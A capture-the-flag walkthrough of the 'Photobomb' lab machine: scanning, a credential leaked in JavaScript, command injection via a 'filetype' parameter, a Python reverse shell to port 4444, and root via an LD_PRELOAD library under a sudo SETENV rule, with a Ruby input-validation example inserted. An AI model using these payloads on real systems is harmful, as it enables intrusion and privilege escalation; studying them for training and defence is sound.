Scanning

> TARGET=10.129.54.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://photobomb.htb/
  • Add a hosts entry for photobomb.htb so the redirect resolves

Web Enum

  • Browsing the website reveals a JavaScript file photobomb.js that contains the credential pH0t0:b0Mb!
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;
  • Browse to http://photobomb.htb/printer/welcome and log in with the credential above
  • The response references a PNG on the local loopback address
<img src='http://127.0.0.1:4567/__sinatra__/404.png'>
  • Browsing the page http://photobomb.htb/printer/welcome reveals that the backend might support python
  • Further browsing finds http://photobomb.htb/printer, which has a POST form for downloading photos

Foothold

  • Run Burp Suite and try to download a large photo. Note: for some reason, POST requests disappear from Burp once they complete. Therefore, select a large photo so the POST request shows up in the history, then send it to the Repeater.
  • Tampering with the POST parameters shows that the filetype parameter may be injectable
# Req
photo=nathaniel-worrell-zK_az6W3xIo-unsplash.jpg&filetype=png;id&dimensions=3000x2000

# Rsp
HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 09 Oct 2022 07:35:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 71
Connection: close
Content-Disposition: attachment; filename=nathaniel-worrell-zK_az6W3xIo-unsplash_3000x2000.png;id
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN

Failed to generate a copy of nathaniel-worrell-zK_az6W3xIo-unsplash.jpg
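For contrast, the following shows how the resize endpoint could validate these parameters so that a filetype value such as png;id is rejected and logged instead of reaching a shell. This is an added example, not the Photobomb application's own code; the function names, the convert command and the directory layout are assumptions, and the backend is assumed to be Ruby because of the __sinatra__ path seen above.

```ruby
# Added example: allow-list validation for the resize parameters plus a
# cheap detection check. Names, paths and the convert command are assumptions.

ALLOWED_FILETYPES = %w[png jpg].freeze
PHOTO_NAME_RE = /\A[\w.-]+\.jpg\z/         # basename only, no path separators
DIMENSIONS_RE = /\A\d{1,5}x\d{1,5}\z/      # e.g. 3000x2000

class InvalidParameter < StandardError; end

# Vulnerable pattern: every parameter interpolated into one shell string.
# A filetype of "png;id" turns the ';' into a command separator, which is
# what the 500 response in the write-up reflects.
def unsafe_command_string(photo, filetype, dimensions)
  out = photo.sub(/\.jpg\z/, "_#{dimensions}.#{filetype}")
  "convert source_images/#{photo} -resize #{dimensions} resized/#{out}"
end

# Hardened version: strict allow-list / format checks, then an argv array.
# Pass the array to Open3.capture3(*argv) or Process.spawn(*argv); with no
# shell involved, ';' would only ever be a literal byte in a filename.
def safe_command_argv(photo, filetype, dimensions)
  raise InvalidParameter, "photo" unless photo.match?(PHOTO_NAME_RE)
  raise InvalidParameter, "filetype" unless ALLOWED_FILETYPES.include?(filetype)
  raise InvalidParameter, "dimensions" unless dimensions.match?(DIMENSIONS_RE)
  out = photo.sub(/\.jpg\z/, "_#{dimensions}.#{filetype}")
  ["convert", "source_images/#{photo}", "-resize", dimensions, "resized/#{out}"]
end

# Detection helper: flag any parameter carrying shell metacharacters so the
# attempt can be logged even after the allow-list has already rejected it.
def suspicious_parameter?(value)
  value.match?(/[;&|`$()<>\n]/)
end

if __FILE__ == $0
  # Constructed inputs: the legitimate request and the injected one from the write-up.
  good = ["nathaniel-worrell-zK_az6W3xIo-unsplash.jpg", "png", "3000x2000"]
  bad  = ["nathaniel-worrell-zK_az6W3xIo-unsplash.jpg", "png;id", "3000x2000"]
  puts "unsafe: #{unsafe_command_string(*bad)}"
  p safe_command_argv(*good)
  begin
    safe_command_argv(*bad)
  rescue InvalidParameter => e
    flagged = bad.select { |v| suspicious_parameter?(v) }
    puts "rejected #{e.message}; suspicious values: #{flagged.inspect}"
  end
end
```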
  • Prepare a Python reverse shell and URL-encode it
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Receive a reverse shell as wizard and fetch the user flag

PE

  • Check the sudo rights
wizard@photobomb:~$ sudo -l

Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
  • The SETENV tag means environment variables such as LD_PRELOAD are passed through sudo, so let’s create a simple PE shell to exploit this
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid / setuid */

/* Runs when the library is loaded; -nostartfiles below lets us supply _init ourselves */
void _init() {
    unsetenv("LD_PRELOAD");   /* stop the library from being loaded again by child processes */
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");
}
  • Compile and upload to the target
> gcc -fPIC -shared -o shell.so shell.c -nostartfiles
  • Trigger the shell and fetch the root flag
> sudo LD_PRELOAD=/home/wizard/shell.so /opt/cleanup.sh